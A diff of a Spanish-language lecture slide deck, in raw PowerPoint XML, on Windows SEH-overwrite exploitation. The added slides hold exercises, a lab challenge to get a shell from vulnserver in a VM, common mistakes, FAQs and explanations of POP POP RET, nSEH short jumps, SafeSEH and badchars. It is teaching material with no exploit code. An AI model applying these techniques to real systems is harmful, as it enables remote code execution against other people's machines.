--- a/classes/parte-5-explotacion-de-sistemas-y-binarios/129-explotacion-en-windows-manejo-de-seh/clase-129-presentacion.pptx
+++ b/classes/parte-5-explotacion-de-sistemas-y-binarios/129-explotacion-en-windows-manejo-de-seh/clase-129-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,67 +3239,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El handler no se ejecuta — No se disparó la excepción; asegura corromper la cadena SEH</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  POP POP RET rechazado — El módulo tiene SafeSEH; elige otro con !mona seh</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Shellcode truncado — Badchars presentes; regenera evitándolos</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Short jmp cae en basura — Distancia de salto mal calculada</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Funciona sin DEP, no con DEP — Necesitas ROP para marcar memoria ejecutable</a:t>
+              <a:t>•  Localiza los badchars del servicio con !mona bytearray y compara memoria.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Explica por qué se salta primero a nSEH y no directamente al shellcode.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Identifica un módulo sin SafeSEH en el proceso con !mona modules.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sustituye el short jmp por un egghunter cuando el espacio es escaso.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Describe cómo SEHOP rompería tu cadena y qué haría falta.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Adapta el shellcode para evitar un badchar concreto (\x00, \x0a).</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3347,7 +3365,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3385,82 +3403,52 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Por qué SEH en vez del ret clásico? Cuando el overflow es grande, corromper SEH suele ser más</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  fiable que alcanzar el retorno directo.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Sigue siendo relevante? En software legacy y algunos servicios sí; en binarios modernos con</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  SafeSEH+SEHOP+DEP+ASLR es mucho más difícil.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿mona funciona en WinDbg moderno? Está pensado para Immunity/WinDbg; existen ports. Muchos usan</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  x64dbg + scripts propios hoy.</a:t>
+              <a:t>•  Sobre vulnserver en tu VM, consigue ejecución de código mediante sobrescritura de SEH y recibe una</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  shell en tu listener local.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: tu listener recibe una shell del proceso vulnserver; el payload usa un</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  POP POP RET de un módulo sin SafeSEH y un short jmp en nSEH.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3511,7 +3499,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3549,6 +3537,319 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  El handler no se ejecuta — No se disparó la excepción; asegura corromper la cadena SEH</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  POP POP RET rechazado — El módulo tiene SafeSEH; elige otro con !mona seh</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Shellcode truncado — Badchars presentes; regenera evitándolos</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Short jmp cae en basura — Distancia de salto mal calculada</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Funciona sin DEP, no con DEP — Necesitas ROP para marcar memoria ejecutable</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué SEH en vez del ret clásico? Cuando el overflow es grande, corromper SEH suele ser más</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  fiable que alcanzar el retorno directo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Sigue siendo relevante? En software legacy y algunos servicios sí; en binarios modernos con</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SafeSEH+SEHOP+DEP+ASLR es mucho más difícil.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿mona funciona en WinDbg moderno? Está pensado para Immunity/WinDbg; existen ports. Muchos usan</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  x64dbg + scripts propios hoy.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  Corelan, "Exploit writing tutorial part 3: SEH" — &lt;https://www.corelan.be/&gt;</a:t>
             </a:r>
           </a:p>
@@ -3599,6 +3900,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="eb092a71bf790fc7.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3682710" y="1097280"/>
+            <a:ext cx="1778580" cy="5303520"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -4122,7 +4498,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4160,97 +4536,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  SEH (Structured Exception Handling): mecanismo de Windows con una lista enlazada de manejadores</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  en el stack. Clave: cada registro tiene next y handler.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Sobrescritura de SEH: el overflow sobrescribe handler (y next) para desviar la ejecución al</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  disparar una excepción. Clave: útil cuando el overflow es mayor que la distancia al retorno.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  POP POP RET: gadget que, al invocarse el handler, salta a nSEH (los 4 bytes previos), donde se</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  coloca un short jmp al shellcode. Clave: técnica canónica de SEH.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  SafeSEH: lista blanca de handlers válidos por módulo. Clave: obliga a usar un POP POP RET en</a:t>
+              <a:t>•  Aunque los fundamentos —controlar el flujo tras un overflow— son universales, Windows tiene una</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  arquitectura de manejo de errores propia que abre una vía de explotación característica: el</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Structured Exception Handling (SEH). En Windows, cuando ocurre una excepción (un acceso a</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  memoria inválido, una división por cero), el sistema no aborta de inmediato: recorre una cadena de</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  manejadores de excepciones registrados, dándole a cada uno la oportunidad de tratar el error. Esa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  cadena vive en la pila, y ahí está la vulnerabilidad: un overflow que la alcance puede</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  secuestrar el manejador, de modo que la próxima excepción salte a código del atacante.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4301,7 +4677,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4339,67 +4715,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  En una VM Windows aislada (sin red hacia producción):</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  x64dbg o WinDbg (con la extensión de mona en Immunity Debugger clásico).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  mona.py de Corelan.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  vulnserver como objetivo de práctica legal.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  pwntools/python para enviar el payload por socket.</a:t>
+              <a:t>•  SEH (Structured Exception Handling): mecanismo de Windows con una lista enlazada de manejadores</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  en el stack. Clave: cada registro tiene next y handler.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sobrescritura de SEH: el overflow sobrescribe handler (y next) para desviar la ejecución al</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  disparar una excepción. Clave: útil cuando el overflow es mayor que la distancia al retorno.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  POP POP RET: gadget que, al invocarse el handler, salta a nSEH (los 4 bytes previos), donde se</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
